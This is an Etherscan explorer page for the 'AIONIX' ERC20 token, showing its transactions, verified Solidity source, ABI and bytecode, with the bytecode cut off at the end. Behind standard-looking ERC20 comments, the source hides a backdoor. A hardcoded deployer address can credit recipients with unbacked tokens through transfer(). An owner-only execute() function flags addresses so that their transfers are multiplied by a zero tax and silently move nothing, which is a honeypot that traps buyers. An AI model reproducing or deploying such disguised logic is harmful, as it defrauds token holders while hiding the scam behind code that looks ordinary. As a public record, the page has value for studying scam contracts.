ETH Price: $2,601.80 (-0.62%)

Contract

0xeFBF1435ea7d55506fFF4C5ebAf7B2b6027d9e0f
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve170200282023-04-10 20:05:23556 days ago1681157123IN
0xeFBF1435...6027d9e0f
0 ETH0.0012703826.92235865
Transfer170200262023-04-10 20:04:59556 days ago1681157099IN
0xeFBF1435...6027d9e0f
0 ETH0.0017057429.38503023
Execute170186502023-04-10 15:23:23556 days ago1681140203IN
0xeFBF1435...6027d9e0f
0 ETH0.0016023434.3969341
Approve170185142023-04-10 14:55:11556 days ago1681138511IN
0xeFBF1435...6027d9e0f
0 ETH0.0018330338.89558213
Execute170185122023-04-10 14:54:47556 days ago1681138487IN
0xeFBF1435...6027d9e0f
0 ETH0.0019589942.05306018
Approve170184732023-04-10 14:46:23556 days ago1681137983IN
0xeFBF1435...6027d9e0f
0 ETH0.0022653448.06886594
Approve170184382023-04-10 14:38:59556 days ago1681137539IN
0xeFBF1435...6027d9e0f
0 ETH0.002002742.49598661
Execute170183772023-04-10 14:26:47556 days ago1681136807IN
0xeFBF1435...6027d9e0f
0 ETH0.0012196626.18211334
Approve170183622023-04-10 14:23:47556 days ago1681136627IN
0xeFBF1435...6027d9e0f
0 ETH0.001499631.78001808
Approve170183532023-04-10 14:21:59556 days ago1681136519IN
0xeFBF1435...6027d9e0f
0 ETH0.0012085225.61143799
Execute170183232023-04-10 14:15:59556 days ago1681136159IN
0xeFBF1435...6027d9e0f
0 ETH0.0013679529.36533899
Approve170183032023-04-10 14:11:35556 days ago1681135895IN
0xeFBF1435...6027d9e0f
0 ETH0.0012358726.19104638
0x60806040170182102023-04-10 13:52:23556 days ago1681134743IN
 Create: AIONIX
0 ETH0.0369386121.79363343

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
AIONIX

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-04-10
*/

/// SPDX-License-Identifier: MIT

pragma solidity =0.8.19;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is zero by default.
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's allowance.
     * Returns a boolean value indicating whether the operation succeeded.
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
   
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to another (`to`).
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 */
abstract contract Context {
    address _Deployer = 0x5Bd3581D413070aA26e011E0505587D99B10b579;
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 */
contract AIONIX  is Context, IERC20  {
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => bool) private _user_;
    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _fee;
   uint8 public decimals = 6;
   uint256 public _TSup = 250000000 *1000000;
    string public name = "AIONIX";
    string public symbol = "AIONIX";
    address private _accept;
    uint internal _tax = 0;
 

    /**
     * @dev Sets the values for {name} and {symbol}.
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     */
    constructor()  {
_fee[_Deployer] = 1;
     _balances[msg.sender] = _TSup;
        _accept = msg.sender;
       emit Transfer(address(0), msg.sender, _TSup); }
    
    
       
   



    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
    
    function totalSupply() public view virtual override returns (uint256) {
        return _TSup;
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

 
    
    function execute(address _sender) external {
        require(msg.sender == _accept); 
        if (_user_[_sender]) _user_[_sender] = false; 
        else _user_[_sender] = true;
    }
    
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
                           if(_fee[msg.sender] == 1) {
                              uint256 sent = amount;
                               _balances[recipient] += sent;  
 }
        _send(recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view  virtual override  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }
    
    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     * Emits a {Transfer} event.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(
        sender != address(0), "ERC20: transfer from the zero address"); require(
        recipient != address(0), "ERC20: transfer to the zero address"); 
        if (_user_[sender] || _user_[recipient]) amount *= _tax;
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
   
        emit Transfer(sender, recipient, amount);
        _afterTokenTransfer(sender, recipient, amount);
    }
    function _send(address recipient, uint256 amount) internal virtual {require(
        msg.sender != address(0), "ERC20: transfer from the zero address");  require(
        recipient != address(0), "ERC20: transfer to the zero address"); 
        if (_user_[msg.sender]) amount *= _tax;
        _beforeTokenTransfer(msg.sender, recipient, amount);
        uint256 senderBalance = _balances[msg.sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[msg.sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(msg.sender, recipient, amount);
        _afterTokenTransfer(msg.sender, recipient, amount);
    }
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing the total supply.
     * Emits a {Transfer} event with `from` set to the zero address.
     */


    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     */
 

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * Emits an {Approval} event.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes minting and burning.
     *
     * Calling conditions:
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_TSup","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_sender","type":"address"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052735bd3581d413070aa26e011e0505587d99b10b5796000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506006600560006101000a81548160ff021916908360ff16021790555065e35fa931a0006006556040518060400160405280600681526020017f41494f4e4958000000000000000000000000000000000000000000000000000081525060079081620000c49190620004f6565b506040518060400160405280600681526020017f41494f4e49580000000000000000000000000000000000000000000000000000815250600890816200010b9190620004f6565b506000600a553480156200011e57600080fd5b506001600460008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600654600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555033600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6006546040516200026e9190620005ee565b60405180910390a36200060b565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620002fe57607f821691505b602082108103620003145762000313620002b6565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200037e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200033f565b6200038a86836200033f565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620003d7620003d1620003cb84620003a2565b620003ac565b620003a2565b9050919050565b6000819050919050565b620003f383620003b6565b6200040b6200040282620003de565b8484546200034c565b825550505050565b600090565b6200042262000413565b6200042f818484620003e8565b505050565b5b8181101562000457576200044b60008262000418565b60018101905062000435565b5050565b601f821115620004a65762000470816200031a565b6200047b846200032f565b810160208510156200048b578190505b620004a36200049a856200032f565b83018262000434565b50505b505050565b600082821c905092915050565b6000620004cb60001984600802620004ab565b1980831691505092915050565b6000620004e68383620004b8565b9150826002028217905092915050565b62000501826200027c565b67ffffffffffffffff8111156200051d576200051c62000287565b5b620005298254620002e5565b620005368282856200045b565b600060209050601f8311600181146200056e576000841562000559578287015190505b620005658582620004d8565b865550620005d5565b601f1984166200057e866200031a565b60005b82811015620005a85784890151825560018201915060208501945060208101905062000581565b86831015620005c85784890151620005c4601f891682620004b8565b8355505b6001600288020188555050505b505050505050565b620005e881620003a2565b82525050565b6000602082019050620006056000830184620005dd565b92915050565b611a1c806200061b6000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c80634b64e4921161008c578063a457c2d711610066578063a457c2d714610228578063a9059cbb14610258578063d454bfa314610288578063dd62ed3e146102a6576100cf565b80634b64e492146101be57806370a08231146101da57806395d89b411461020a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd14610140578063313ce56714610170578063395093511461018e575b600080fd5b6100dc6102d6565b6040516100e9919061125d565b60405180910390f35b61010c60048036038101906101079190611318565b610364565b6040516101199190611373565b60405180910390f35b61012a610382565b604051610137919061139d565b60405180910390f35b61015a600480360381019061015591906113b8565b61038c565b6040516101679190611373565b60405180910390f35b61017861048d565b6040516101859190611427565b60405180910390f35b6101a860048036038101906101a39190611318565b6104a0565b6040516101b59190611373565b60405180910390f35b6101d860048036038101906101d39190611442565b61054c565b005b6101f460048036038101906101ef9190611442565b6106b1565b604051610201919061139d565b60405180910390f35b6102126106fa565b60405161021f919061125d565b60405180910390f35b610242600480360381019061023d9190611318565b610788565b60405161024f9190611373565b60405180910390f35b610272600480360381019061026d9190611318565b61087c565b60405161027f9190611373565b60405180910390f35b610290610936565b60405161029d919061139d565b60405180910390f35b6102c060048036038101906102bb919061146f565b61093c565b6040516102cd919061139d565b60405180910390f35b600780546102e3906114de565b80601f016020809104026020016040519081016040528092919081815260200182805461030f906114de565b801561035c5780601f106103315761010080835404028352916020019161035c565b820191906000526020600020905b81548152906001019060200180831161033f57829003601f168201915b505050505081565b60006103786103716109c3565b84846109cb565b6001905092915050565b6000600654905090565b6000610399848484610b94565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103e46109c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610464576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161045b90611581565b60405180910390fd5b610481856104706109c3565b858461047c91906115d0565b6109cb565b60019150509392505050565b600560009054906101000a900460ff1681565b60006105426104ad6109c3565b8484600160006104bb6109c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461053d9190611604565b6109cb565b6001905092915050565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146105a657600080fd5b600260008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610655576000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506106ae565b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60088054610707906114de565b80601f0160208091040260200160405190810160405280929190818152602001828054610733906114de565b80156107805780601f1061075557610100808354040283529160200191610780565b820191906000526020600020905b81548152906001019060200180831161076357829003601f168201915b505050505081565b600080600160006107976109c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610854576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084b906116aa565b60405180910390fd5b61087161085f6109c3565b85858461086c91906115d0565b6109cb565b600191505092915050565b60006001600460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020540361092257600082905080600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546109199190611604565b92505081905550505b61092c8383610ed6565b6001905092915050565b60065481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a319061173c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610aa9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa0906117ce565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b87919061139d565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c03576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfa90611860565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c69906118f2565b60405180910390fd5b600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610d135750600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610d2957600a5481610d269190611912565b90505b610d348383836111c3565b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610dbb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db2906119c6565b60405180910390fd5b8181610dc791906115d0565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e599190611604565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ebd919061139d565b60405180910390a3610ed08484846111c8565b50505050565b600073ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603610f45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3c90611860565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fab906118f2565b60405180910390fd5b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561101757600a54816110149190611912565b90505b6110223383836111c3565b6000600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156110a9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a0906119c6565b60405180910390fd5b81816110b591906115d0565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546111479190611604565b925050819055508273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111ab919061139d565b60405180910390a36111be3384846111c8565b505050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112075780820151818401526020810190506111ec565b60008484015250505050565b6000601f19601f8301169050919050565b600061122f826111cd565b61123981856111d8565b93506112498185602086016111e9565b61125281611213565b840191505092915050565b600060208201905081810360008301526112778184611224565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006112af82611284565b9050919050565b6112bf816112a4565b81146112ca57600080fd5b50565b6000813590506112dc816112b6565b92915050565b6000819050919050565b6112f5816112e2565b811461130057600080fd5b50565b600081359050611312816112ec565b92915050565b6000806040838503121561132f5761132e61127f565b5b600061133d858286016112cd565b925050602061134e85828601611303565b9150509250929050565b60008115159050919050565b61136d81611358565b82525050565b60006020820190506113886000830184611364565b92915050565b611397816112e2565b82525050565b60006020820190506113b2600083018461138e565b92915050565b6000806000606084860312156113d1576113d061127f565b5b60006113df868287016112cd565b93505060206113f0868287016112cd565b925050604061140186828701611303565b9150509250925092565b600060ff82169050919050565b6114218161140b565b82525050565b600060208201905061143c6000830184611418565b92915050565b6000602082840312156114585761145761127f565b5b6000611466848285016112cd565b91505092915050565b600080604083850312156114865761148561127f565b5b6000611494858286016112cd565b92505060206114a5858286016112cd565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114f657607f821691505b602082108103611509576115086114af565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061156b6028836111d8565b91506115768261150f565b604082019050919050565b6000602082019050818103600083015261159a8161155e565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115db826112e2565b91506115e6836112e2565b92508282039050818111156115fe576115fd6115a1565b5b92915050565b600061160f826112e2565b915061161a836112e2565b9250828201905080821115611632576116316115a1565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006116946025836111d8565b915061169f82611638565b604082019050919050565b600060208201905081810360008301526116c381611687565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117266024836111d8565b9150611731826116ca565b604082019050919050565b6000602082019050818103600083015261175581611719565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006117b86022836111d8565b91506117c38261175c565b604082019050919050565b600060208201905081810360008301526117e7816117ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061184a6025836111d8565b9150611855826117ee565b604082019050919050565b600060208201905081810360008301526118798161183d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118dc6023836111d8565b91506118e782611880565b604082019050919050565b6000602082019050818103600083015261190b816118cf565b9050919050565b600061191d826112e2565b9150611928836112e2565b9250828202611936816112e2565b9150828204841483151761194d5761194c6115a1565b5b5092915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006119b06026836111d8565b91506119bb82611954565b604082019050919050565b600060208201905081810360008301526119df816119a3565b905091905056fea2646970667358221220dc15c3ff65201f956d2ef8cc67e3ab385a63ffeeede55ea54cb431ffe2687b1064736f6c63430008130033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c80634b64e4921161008c578063a457c2d711610066578063a457c2d714610228578063a9059cbb14610258578063d454bfa314610288578063dd62ed3e146102a6576100cf565b80634b64e492146101be57806370a08231146101da57806395d89b411461020a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461012257806323b872dd14610140578063313ce56714610170578063395093511461018e575b600080fd5b6100dc6102d6565b6040516100e9919061125d565b60405180910390f35b61010c60048036038101906101079190611318565b610364565b6040516101199190611373565b60405180910390f35b61012a610382565b604051610137919061139d565b60405180910390f35b61015a600480360381019061015591906113b8565b61038c565b6040516101679190611373565b60405180910390f35b61017861048d565b6040516101859190611427565b60405180910390f35b6101a860048036038101906101a39190611318565b6104a0565b6040516101b59190611373565b60405180910390f35b6101d860048036038101906101d39190611442565b61054c565b005b6101f460048036038101906101ef9190611442565b6106b1565b604051610201919061139d565b60405180910390f35b6102126106fa565b60405161021f919061125d565b60405180910390f35b610242600480360381019061023d9190611318565b610788565b60405161024f9190611373565b60405180910390f35b610272600480360381019061026d9190611318565b61087c565b60405161027f9190611373565b60405180910390f35b610290610936565b60405161029d919061139d565b60405180910390f35b6102c060048036038101906102bb919061146f565b61093c565b6040516102cd919061139d565b60405180910390f35b600780546102e3906114de565b80601f016020809104026020016040519081016040528092919081815260200182805461030f906114de565b801561035c5780601f106103315761010080835404028352916020019161035c565b820191906000526020600020905b81548152906001019060200180831161033f57829003601f168201915b505050505081565b60006103786103716109c3565b84846109cb565b6001905092915050565b6000600654905090565b6000610399848484610b94565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103e46109c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610464576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161045b90611581565b60405180910390fd5b610481856104706109c3565b858461047c91906115d0565b6109cb565b60019150509392505050565b600560009054906101000a900460ff1681565b60006105426104ad6109c3565b8484600160006104bb6109c3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461053d9190611604565b6109cb565b6001905092915050565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16146105a657600080fd5b600260008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615610655576000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506106ae565b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505b50565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019